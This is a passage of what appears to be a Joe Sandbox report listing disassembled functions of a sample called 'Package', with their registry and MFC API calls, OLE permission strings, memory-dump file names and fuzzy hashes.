Instruction Fuzzy Hash: B811493590011A9BCB04EBA0D856AAEBB75FF54324F604228F551B72E1CB306E45CFB5

Function 00D2E8E0 Relevance: 14.0, APIs: 1, Strings: 7, Instructions: 32windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00D3B8D5: __EH_prolog3.LIBCMT ref: 00D3B8DC
Part of subcall function 00D3B8D5: LoadCursorW.USER32(00000000,00007F02), ref: 00D3B8F4
Part of subcall function 00D3B8D5: SetCursor.USER32(00000000), ref: 00D3B8FB
Part of subcall function 00D3B8D5: RegOpenKeyExW.ADVAPI32(?,?,00000000,000F003F,?), ref: 00D3B911
Part of subcall function 00D3B8D5: LoadCursorW.USER32(00000000,00007F00), ref: 00D3B924
Part of subcall function 00D3B8D5: SetCursor.USER32(00000000), ref: 00D3B92B

SendMessageW.USER32(?,00001009,00000000,00000000), ref: 00D2E924

Part of subcall function 00D3C0BC: __EH_prolog3_GS.LIBCMT ref: 00D3C0C6
Part of subcall function 00D3C0BC: #540.MFC42U(00000488,00D2C76E,?,80000000,?,AccessPermission,?,?,?,?), ref: 00D3C0F1
Part of subcall function 00D3C0BC: RegOpenKeyExW.ADVAPI32 ref: 00D3C112
Part of subcall function 00D3C0BC: RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00D3C13A
Part of subcall function 00D3C0BC: RegCloseKey.ADVAPI32(?), ref: 00D3C151
Part of subcall function 00D3C0BC: #800.MFC42U ref: 00D3C15F

Strings

DEFAULTLAUNCHPERMISSION, xrefs: 00D2E92A
DefaultLaunchPermission, xrefs: 00D2E8F9
Cannot Launch, xrefs: 00D2E8E5
Global Launch, xrefs: 00D2E8EF
All classes, xrefs: 00D2E8F4
SOFTWARE\MICROSOFT\OLE, xrefs: 00D2E8FE, 00D2E908, 00D2E92F
Can Launch, xrefs: 00D2E8EA

Memory Dump Source

Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d20000_Package.jbxd

Similarity

API ID: Cursor$LoadOpen$#540#800CloseH_prolog3H_prolog3_MessageQuerySendValue
String ID: All classes$Can Launch$Cannot Launch$DEFAULTLAUNCHPERMISSION$DefaultLaunchPermission$Global Launch$SOFTWARE\MICROSOFT\OLE
API String ID: 1128567903-2386912880
Opcode ID: d0976d772d3c2a71c9b7de720b0146437da10d496023f7940a2a749690981e0f
Instruction ID: 09fa6a622b7f1683387ecd02d1924c7f4a49849a3df849697163a2791d06efe4
Opcode Fuzzy Hash: d0976d772d3c2a71c9b7de720b0146437da10d496023f7940a2a749690981e0f
Instruction Fuzzy Hash: 53E092323803A07AD2316165BC4BF872A5DD7E2F29F15041A7204B51C2CAE8DA098270

Function 00D2E6C0 Relevance: 14.0, APIs: 1, Strings: 7, Instructions: 32windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00D3B8D5: __EH_prolog3.LIBCMT ref: 00D3B8DC
Part of subcall function 00D3B8D5: LoadCursorW.USER32(00000000,00007F02), ref: 00D3B8F4
Part of subcall function 00D3B8D5: SetCursor.USER32(00000000), ref: 00D3B8FB
Part of subcall function 00D3B8D5: RegOpenKeyExW.ADVAPI32(?,?,00000000,000F003F,?), ref: 00D3B911
Part of subcall function 00D3B8D5: LoadCursorW.USER32(00000000,00007F00), ref: 00D3B924
Part of subcall function 00D3B8D5: SetCursor.USER32(00000000), ref: 00D3B92B

SendMessageW.USER32(?,00001009,00000000,00000000), ref: 00D2E704

Part of subcall function 00D3C0BC: __EH_prolog3_GS.LIBCMT ref: 00D3C0C6
Part of subcall function 00D3C0BC: #540.MFC42U(00000488,00D2C76E,?,80000000,?,AccessPermission,?,?,?,?), ref: 00D3C0F1
Part of subcall function 00D3C0BC: RegOpenKeyExW.ADVAPI32 ref: 00D3C112
Part of subcall function 00D3C0BC: RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00D3C13A
Part of subcall function 00D3C0BC: RegCloseKey.ADVAPI32(?), ref: 00D3C151
Part of subcall function 00D3C0BC: #800.MFC42U ref: 00D3C15F

Strings

Global Access, xrefs: 00D2E6CF
DEFAULTACCESSPERMISSION, xrefs: 00D2E70A
DefaultAccessPermission, xrefs: 00D2E6D9
All classes, xrefs: 00D2E6D4
Cannot Access, xrefs: 00D2E6C5
SOFTWARE\MICROSOFT\OLE, xrefs: 00D2E6DE, 00D2E6E8, 00D2E70F
Can Access, xrefs: 00D2E6CA

Memory Dump Source

Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d20000_Package.jbxd

Similarity

API ID: Cursor$LoadOpen$#540#800CloseH_prolog3H_prolog3_MessageQuerySendValue
String ID: All classes$Can Access$Cannot Access$DEFAULTACCESSPERMISSION$DefaultAccessPermission$Global Access$SOFTWARE\MICROSOFT\OLE
API String ID: 1128567903-1534462617
Opcode ID: cb2aaa639850ec918d4635d8b2405423b743380bb84a8b54e4a695209990172f
Instruction ID: eb5c3b373bc5035f13edd76f70567aa109913d58e8ae67e5eee039946d8abe57
Opcode Fuzzy Hash: cb2aaa639850ec918d4635d8b2405423b743380bb84a8b54e4a695209990172f
Instruction Fuzzy Hash: 8BE0D8323C03607BD63111627C4BF832A5DDBE1F29F55011EB608B61C2C6D99918C274

Function 00D2F540 Relevance: 13.6, APIs: 9, Instructions: 56COMMON

Download Yara Rule

APIs

#2294.MFC42U(?,000000B8,?), ref: 00D2F556
#2294.MFC42U(?,000000B1,?,?,000000B8,?), ref: 00D2F568
#2294.MFC42U(?,000000B2,?,?,000000B1,?,?,000000B8,?), ref: 00D2F57A
#2294.MFC42U(?,000000A8,?,?,000000B2,?,?,000000B1,?,?,000000B8,?), ref: 00D2F58C
#2294.MFC42U(?,00000089,?,?,000000A8,?,?,000000B2,?,?,000000B1,?,?,000000B8,?), ref: 00D2F59E
#2362.MFC42U(?,000000B3,?,?,00000089,?,?,000000A8,?,?,000000B2,?,?,000000B1,?,?), ref: 00D2F5B0
#2362.MFC42U(?,0000008B,?,?,000000B3,?,?,00000089,?,?,000000A8,?,?,000000B2,?,?), ref: 00D2F5C2
#2362.MFC42U(?,00001FA5,?,?,0000008B,?,?,000000B3,?,?,00000089,?,?,000000A8,?,?), ref: 00D2F5D4
#2362.MFC42U(?,000000A9,?,?,00001FA5,?,?,0000008B,?,?,000000B3,?,?,00000089,?,?), ref: 00D2F5E6

Memory Dump Source

Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d20000_Package.jbxd

Similarity

API ID: #2294$#2362
String ID:
API String ID: 4178481822-0
Opcode ID: e58633bced6d5a45809b51faafe11d84fbc9487d8c942ae8110a08502053bd4b
Instruction ID: f98c2e3815b8fd9fcb2bc1dd3388134b58f087e257199e7b5d279c91c586069c
Opcode Fuzzy Hash: e58633bced6d5a45809b51faafe11d84fbc9487d8c942ae8110a08502053bd4b
Instruction Fuzzy Hash: 0F01A572281A167AE225E6A09C46FEAB35CEF46701F404126BA14D60C1DBB4AA158AF6

Function 6E2F328F Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 303COMMONLIBRARYCODE

Download Yara Rule

APIs

type_info::operator==.LIBVCRUNTIME ref: 6E2F33AE
___TypeMatch.LIBVCRUNTIME ref: 6E2F34BC
_UnwindNestedFrames.LIBCMT ref: 6E2F360E
CallUnexpected.LIBVCRUNTIME ref: 6E2F3629

Strings

csm, xrefs: 6E2F32CC
csm, xrefs: 6E2F33E5
csm, xrefs: 6E2F3339

Memory Dump Source

Source File: 00000005.00000002.2331705193.000000006E2F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E2F0000, based on PE: true

Associated: 00000005.00000002.2331684375.000000006E2F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2331727344.000000006E2FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2331754939.000000006E306000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2331777988.000000006E308000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6e2f0000_Package.jbxd

Similarity

API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
String ID: csm$csm$csm
API String ID: 2751267872-393685449
Opcode ID: df648c3ceaa7838ac009755dcc1985e9fda5173623b27949e0894758f6bf2019
Instruction ID: 66e70b837965d4f2e12e7ec83a110147e14f5ee972b575a35057013262f79e96
Opcode Fuzzy Hash: df648c3ceaa7838ac009755dcc1985e9fda5173623b27949e0894758f6bf2019
Instruction Fuzzy Hash: EDB15BB588020EEFCF15CFE4C94899EFBBABF48316B104559E8116B215DB31DA52CF92

Function 00D36767 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 93registryCOMMON

Download Yara Rule

APIs

RegEnumKeyW.ADVAPI32(00000000,00000000,?,00000050), ref: 00D36789
RegOpenKeyW.ADVAPI32(00000000,?,?), ref: 00D367AB
RegQueryValueExW.ADVAPI32(?,409,00000000,00000000,?,00000200), ref: 00D367E0
wsprintfW.USER32 ref: 00D36813
RegCloseKey.ADVAPI32(?), ref: 00D3690C
RegCloseKey.ADVAPI32(00000000), ref: 00D3691D

Strings

409, xrefs: 00D367D5
%s <no name>, xrefs: 00D36807

Memory Dump Source

Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d20000_Package.jbxd

Similarity

API ID: Close$EnumOpenQueryValuewsprintf
String ID: %s <no name>$409
API String ID: 3624944744-596716345
Opcode ID: 1f695e1102203e8329f22177612bd78338dec2b42ad7c8dcd86ea9bca9027581
Instruction ID: 7245bda8b059a11ada49f504226462f6fdcefde9660565553eb838501e003ea2
Opcode Fuzzy Hash: 1f695e1102203e8329f22177612bd78338dec2b42ad7c8dcd86ea9bca9027581
Instruction Fuzzy Hash: 2341DD74A012289FDB60DF64DC45BA9B7BABF89304F1441E5E509E7250DB329EE4CF20

Function 6E2F82A6 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 74COMMONLIBRARYCODE

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00000000,?,6E2F858B,00000022,FlsSetValue,6E300550,6E300558,00000000,?,6E2F68CF,FFFFFFFF,000000FF,?,?,6E2F4C74), ref: 6E2F8367

Strings

api-ms-, xrefs: 6E2F82FD
ext-ms-, xrefs: 6E2F8311
tL/n, xrefs: 6E2F82A8

Memory Dump Source

Source File: 00000005.00000002.2331705193.000000006E2F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E2F0000, based on PE: true

Associated: 00000005.00000002.2331684375.000000006E2F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2331727344.000000006E2FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2331754939.000000006E306000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2331777988.000000006E308000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6e2f0000_Package.jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-$ext-ms-$tL/n
API String ID: 3664257935-1946474827
Opcode ID: fda7be7cd6226908d171a49284d53d47965354778124f47e16edba26d902b999
Instruction ID: b41fd6613e95648fae30402351b0297c1890d519d3e078d7a5f71f1c13495170
Opcode Fuzzy Hash: fda7be7cd6226908d171a49284d53d47965354778124f47e16edba26d902b999
Instruction Fuzzy Hash: 292138315C161AEFDB159AA6CC44E8FF76A9F423B1B244125EC11A7294DB30ED02CBA0

Function 00D379B1 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 34registryCOMMON

Download Yara Rule

APIs

RegOpenKeyW.ADVAPI32(00D37AC1,InprocServer32,00000000), ref: 00D379C7
RegOpenKeyW.ADVAPI32(00D37AC1,InprocHandler32,00000000), ref: 00D379DD
RegOpenKeyW.ADVAPI32(00D37AC1,LocalServer32,00000000), ref: 00D379F3
RegCloseKey.ADVAPI32(00000000,?,?,00D37AC1), ref: 00D37A00

Strings

LocalServer32, xrefs: 00D379EB
InprocServer32, xrefs: 00D379BF
InprocHandler32, xrefs: 00D379D5

Memory Dump Source

Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d20000_Package.jbxd

Similarity

API ID: Open$Close
String ID: InprocHandler32$InprocServer32$LocalServer32
API String ID: 3083169812-2616365248
Opcode ID: 5314ca2dc6ee76f595209b83347a8d1db29027bf00b074e5aa74734f76a3e1de
Instruction ID: 158c8463596e0deb37f90ab2eda68c05da939b3b2ba4518cfb35d3c9acdd1ce5
Opcode Fuzzy Hash: 5314ca2dc6ee76f595209b83347a8d1db29027bf00b074e5aa74734f76a3e1de
Instruction Fuzzy Hash: A3F01D75208208FFDB21CFA2DD09BAE7AB8EF01749F104024B901E0160D731DA55EA70

Function 6E2FC012 Relevance: 12.2, APIs: 8, Instructions: 248COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,6E2FC2E2,00000000,00000000,00000000,00000001,?,?,?,?,00000001,00000000), ref: 6E2FC0B8
__alloca_probe_16.LIBCMT ref: 6E2FC173
__alloca_probe_16.LIBCMT ref: 6E2FC202
__freea.LIBCMT ref: 6E2FC24D
__freea.LIBCMT ref: 6E2FC253
__freea.LIBCMT ref: 6E2FC289
__freea.LIBCMT ref: 6E2FC28F
__freea.LIBCMT ref: 6E2FC29F

Memory Dump Source

Source File: 00000005.00000002.2331705193.000000006E2F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E2F0000, based on PE: true

Associated: 00000005.00000002.2331684375.000000006E2F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2331727344.000000006E2FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2331754939.000000006E306000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2331777988.000000006E308000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6e2f0000_Package.jbxd

Similarity

API ID: __freea$__alloca_probe_16$Info
String ID:
API String ID: 127012223-0
Opcode ID: 8607fd7072385df2fe1c485ce3223a61d68857dc92a60502d68aea1e1a517242
Instruction ID: 5d6100ce4e012571921a2e5b3dcbd771813c97de418dd0e0272afbf45100eb2c
Opcode Fuzzy Hash: 8607fd7072385df2fe1c485ce3223a61d68857dc92a60502d68aea1e1a517242
Instruction Fuzzy Hash: 2C71B27298420FDBEF118ED48C62F9FF7ABDF89B15F140859E914AB280D76588438798

Function 00D3D81B Relevance: 12.1, APIs: 8, Instructions: 78stringregistryCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(00D3D19D,?,80000000,00000000), ref: 00D3D846
RegCreateKeyExW.ADVAPI32(?,?,00000000,00D221A0,00000000,000F003F,00000000,?,?,?,80000000,00000000), ref: 00D3D881
lstrcpyW.KERNEL32(?,00D3D19D,?,80000000,00000000), ref: 00D3D899
lstrlenW.KERNEL32(80000000,?,80000000,00000000), ref: 00D3D8A0
lstrlenW.KERNEL32(?,?,80000000,00000000), ref: 00D3D8B1
RegSetValueExW.ADVAPI32(?,80000000,00000000,00000001,?,00000000,?,80000000,00000000), ref: 00D3D8EA
RegCloseKey.ADVAPI32(?,?,80000000,00000000), ref: 00D3D8FC

Memory Dump Source

Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d20000_Package.jbxd

Similarity

API ID: lstrlen$CloseCreateValuelstrcpy
String ID:
API String ID: 2938206059-0
Opcode ID: eba29712e1563adeff745887bbb94080952138e144b32da6a2b13a6204b932a7
Instruction ID: 4bc49687b16a55adfd9a35ad2df4faf160744020259e39964605f21a17e1d0b1
Opcode Fuzzy Hash: eba29712e1563adeff745887bbb94080952138e144b32da6a2b13a6204b932a7
Instruction Fuzzy Hash: A52119BA600319ABDB109FA5ED49BEA77BDEB49300F004196F615D3151DA709A94CF70

Function 00D320C0 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 223windowCOMMON

Download Yara Rule

APIs

GetMessagePos.USER32 ref: 00D3210B

Part of subcall function 00D391B7: ScreenToClient.USER32(?,?), ref: 00D391C2

#3909.MFC42U(?,?,?,?,?,?), ref: 00D3218B

Part of subcall function 00D391E9: SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00D391FB

Part of subcall function 00D378FA: SendMessageW.USER32(?,0000113E,00000000,00000014), ref: 00D3790C

#6266.MFC42U(00000002,?,?,?,00000000,00000014,00000000,?,?,?,?,?), ref: 00D32479
#2430.MFC42U(00000002,?,?,?,00000000,00000014,00000000,?,?,?,?,?), ref: 00D32484
#2430.MFC42U(00000002,?,?,?,00000000,00000014,00000000,?,?,?,?,?), ref: 00D3248F

Strings

TypeLib, xrefs: 00D3229D

Memory Dump Source

Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d20000_Package.jbxd

Similarity

API ID: Message$#2430Send$#3909#6266ClientScreen
String ID: TypeLib
API String ID: 852555880-4260498707
Opcode ID: 58f4adffea7e829f77fdf66384af9094916dedf4b8b3143ffe5a9e1046f7d5b0
Instruction ID: c2a157c8fd2099319d47c28830282ac0dc85c803f199740e8525027998160430
Opcode Fuzzy Hash: 58f4adffea7e829f77fdf66384af9094916dedf4b8b3143ffe5a9e1046f7d5b0
Instruction Fuzzy Hash: 8EA1E371D412299BEB64EF54DC8ABECB3B1EB14705F1041E9A1496A1E1CB746EC8CF21

Function 6E2F117D Relevance: 10.6, APIs: 7, Instructions: 136COMMONLIBRARYCODE

Download Yara Rule

APIs

__RTC_Initialize.LIBCMT ref: 6E2F11C4
___scrt_uninitialize_crt.LIBCMT ref: 6E2F11DE

Memory Dump Source

Source File: 00000005.00000002.2331705193.000000006E2F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E2F0000, based on PE: true

Associated: 00000005.00000002.2331684375.000000006E2F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2331727344.000000006E2FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2331754939.000000006E306000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2331777988.000000006E308000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6e2f0000_Package.jbxd

Similarity

API ID: Initialize___scrt_uninitialize_crt
String ID:
API String ID: 2442719207-0
Opcode ID: e3dcd1847b1d0e21d27ae92588159fd439da5d8cf69602fe398694544f94d85a
Instruction ID: c74df18a8d5e42dee83151d86de6fd5722e02ea3f9669107853a22187b36c4ec
Opcode Fuzzy Hash: e3dcd1847b1d0e21d27ae92588159fd439da5d8cf69602fe398694544f94d85a
Instruction Fuzzy Hash: 7141D6B2E8566DEFDB108FD5C900B9EB6BFEB41655F904519E810A7242C7304DCB8B90

Function 00D3DB5F Relevance: 10.6, APIs: 7, Instructions: 121COMMON

Download Yara Rule

APIs

isspace.MSVCRT ref: 00D3DB7C
isdigit.MSVCRT ref: 00D3DBCD
toupper.MSVCRT ref: 00D3DBE3
isxdigit.MSVCRT ref: 00D3DBF6
isdigit.MSVCRT ref: 00D3DC1A
isspace.MSVCRT ref: 00D3DC2E
isspace.MSVCRT ref: 00D3DC49

Memory Dump Source

Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d20000_Package.jbxd

Similarity

API ID: isspace$isdigit$isxdigittoupper
String ID:
API String ID: 4280169866-0
Opcode ID: c378ced1b2d9dd913e129da89db3f33828874aea9afe30eda359ee14477294b1
Instruction ID: e5fddabd4fca2e0a7250fc5d569c67ea65696cc20c6a283042ae882498d559f7
Opcode Fuzzy Hash: c378ced1b2d9dd913e129da89db3f33828874aea9afe30eda359ee14477294b1
Instruction Fuzzy Hash: 81319EB6910221CBCB241F69EC44572B7EAFF59771B2A452AF8C5C7280E774CC80DAB0

Function 6E2F1C50 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 6E2F1C87
___except_validate_context_record.LIBVCRUNTIME ref: 6E2F1C8F
_ValidateLocalCookies.LIBCMT ref: 6E2F1D18
__IsNonwritableInCurrentImage.LIBCMT ref: 6E2F1D43
_ValidateLocalCookies.LIBCMT ref: 6E2F1D98

Strings

csm, xrefs: 6E2F1D2D

Memory Dump Source

Source File: 00000005.00000002.2331705193.000000006E2F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E2F0000, based on PE: true

Associated: 00000005.00000002.2331684375.000000006E2F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2331727344.000000006E2FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2331754939.000000006E306000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2331777988.000000006E308000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6e2f0000_Package.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 66906cc5a656e1d3f0e49e2c2f77cdb773afa917f86a04b197520a3451171eb2
Instruction ID: 6f8db84121bb7910516fcd0b1fc22dc3f9612295cbbdb5cd4de69b0b37af6335
Opcode Fuzzy Hash: 66906cc5a656e1d3f0e49e2c2f77cdb773afa917f86a04b197520a3451171eb2
Instruction Fuzzy Hash: BA41B17498025EDBDF00CFA8C880ADEFBB6AF06328F508555E8159B352C7319A96CB91

Function 00D2D6B6 Relevance: 10.6, APIs: 7, Instructions: 57COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00D2D6BD
#364.MFC42U(0000007A,00000008,00D2D2DA,00000004), ref: 00D2D6C9

Part of subcall function 00D2C4B6: __EH_prolog3.LIBCMT ref: 00D2C4BD
Part of subcall function 00D2C4B6: #324.MFC42U(00000088,00000000,00000008,00D2BFBA,00000004), ref: 00D2C4CE
Part of subcall function 00D2C4B6: #567.MFC42U(00000088,00000000,00000008,00D2BFBA,00000004), ref: 00D2C4E5
Part of subcall function 00D2C4B6: #567.MFC42U(00000088,00000000,00000008,00D2BFBA,00000004), ref: 00D2C500
Part of subcall function 00D2C4B6: #567.MFC42U(00000088,00000000,00000008,00D2BFBA,00000004), ref: 00D2C516
Part of subcall function 00D2C4B6: #567.MFC42U(00000088,00000000,00000008,00D2BFBA,00000004), ref: 00D2C52C

Part of subcall function 00D309D5: __EH_prolog3.LIBCMT ref: 00D309DC
Part of subcall function 00D309D5: #324.MFC42U(00000087,00000000,00000008,00D2D6F2,0000007A,00000008,00D2D2DA,00000004), ref: 00D309ED
Part of subcall function 00D309D5: #567.MFC42U(00000087,00000000,00000008,00D2D6F2,0000007A,00000008,00D2D2DA,00000004), ref: 00D30A04
Part of subcall function 00D309D5: #567.MFC42U(00000087,00000000,00000008,00D2D6F2,0000007A,00000008,00D2D2DA,00000004), ref: 00D30A1F
Part of subcall function 00D309D5: #567.MFC42U(00000087,00000000,00000008,00D2D6F2,0000007A,00000008,00D2D2DA,00000004), ref: 00D30A35
Part of subcall function 00D309D5: #567.MFC42U(00000087,00000000,00000008,00D2D6F2,0000007A,00000008,00D2D2DA,00000004), ref: 00D30A4B
Part of subcall function 00D309D5: #567.MFC42U(00000087,00000000,00000008,00D2D6F2,0000007A,00000008,00D2D2DA,00000004), ref: 00D30A61

Part of subcall function 00D2F346: __EH_prolog3.LIBCMT ref: 00D2F34D
Part of subcall function 00D2F346: #324.MFC42U(0000008B,00000000,00000008,00D2D701,0000007A,00000008,00D2D2DA,00000004), ref: 00D2F35E
Part of subcall function 00D2F346: #567.MFC42U(0000008B,00000000,00000008,00D2D701,0000007A,00000008,00D2D2DA,00000004), ref: 00D2F375
Part of subcall function 00D2F346: #567.MFC42U(0000008B,00000000,00000008,00D2D701,0000007A,00000008,00D2D2DA,00000004), ref: 00D2F38F
Part of subcall function 00D2F346: #567.MFC42U(0000008B,00000000,00000008,00D2D701,0000007A,00000008,00D2D2DA,00000004), ref: 00D2F3AA
Part of subcall function 00D2F346: #567.MFC42U(0000008B,00000000,00000008,00D2D701,0000007A,00000008,00D2D2DA,00000004), ref: 00D2F3C0
Part of subcall function 00D2F346: #567.MFC42U(0000008B,00000000,00000008,00D2D701,0000007A,00000008,00D2D2DA,00000004), ref: 00D2F3DA
Part of subcall function 00D2F346: #540.MFC42U(0000008B,00000000,00000008,00D2D701,0000007A,00000008,00D2D2DA,00000004), ref: 00D2F3EF
Part of subcall function 00D2F346: #540.MFC42U(0000008B,00000000,00000008,00D2D701,0000007A,00000008,00D2D2DA,00000004), ref: 00D2F400
Part of subcall function 00D2F346: #540.MFC42U(0000008B,00000000,00000008,00D2D701,0000007A,00000008,00D2D2DA,00000004), ref: 00D2F40F
Part of subcall function 00D2F346: #540.MFC42U(0000008B,00000000,00000008,00D2D701,0000007A,00000008,00D2D2DA,00000004), ref: 00D2F420
Part of subcall function 00D2F346: #861.MFC42U(00D221A0,0000008B,00000000,00000008,00D2D701,0000007A,00000008,00D2D2DA,00000004), ref: 00D2F436
Part of subcall function 00D2F346: #861.MFC42U(00D221A0,00D221A0,0000008B,00000000,00000008,00D2D701,0000007A,00000008,00D2D2DA,00000004), ref: 00D2F442
Part of subcall function 00D2F346: #861.MFC42U(00D221A0,00D221A0,00D221A0,0000008B,00000000,00000008,00D2D701,0000007A,00000008,00D2D2DA,00000004), ref: 00D2F453
Part of subcall function 00D2F346: #861.MFC42U(00D221A0,00D221A0,00D221A0,00D221A0,0000008B,00000000,00000008,00D2D701,0000007A,00000008,00D2D2DA,00000004), ref: 00D2F45F

Part of subcall function 00D2C962: __EH_prolog3.LIBCMT ref: 00D2C969
Part of subcall function 00D2C962: #324.MFC42U(00000085,00000000,00000008,00D2C91A,00000004), ref: 00D2C97A
Part of subcall function 00D2C962: #567.MFC42U(00000085,00000000,00000008,00D2C91A,00000004), ref: 00D2C991
Part of subcall function 00D2C962: #567.MFC42U(00000085,00000000,00000008,00D2C91A,00000004), ref: 00D2C9AB
Part of subcall function 00D2C962: #540.MFC42U(00000085,00000000,00000008,00D2C91A,00000004), ref: 00D2C9C2
Part of subcall function 00D2C962: #540.MFC42U(00000085,00000000,00000008,00D2C91A,00000004), ref: 00D2C9D1
